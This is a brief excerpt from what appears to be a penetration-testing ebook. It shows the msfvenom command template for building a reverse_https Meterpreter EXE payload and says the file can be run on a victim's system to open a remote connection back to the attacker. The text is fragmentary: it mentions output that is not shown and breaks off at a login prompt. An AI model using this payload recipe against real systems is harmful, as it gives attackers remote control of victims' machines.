Generating an MSF payload using msfvenom

MSFvenom is a built-in tool that generates and obfuscates payloads without the need to start MSF. Execute the msfvenom -p <MSF supported payload> lhost=<IP> lport=<PORT> -f <Output File Format> -o <payload filename> command to generate a reverse_https Meterpreter payload in EXE format and save the file:


In both cases, we used ls -alh https_2.exe.

This payload can now be uploaded/executed on the victim's system to get a reverse Meterpreter connection over a secure HTTPS tunnel back to us.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
3.16.15.149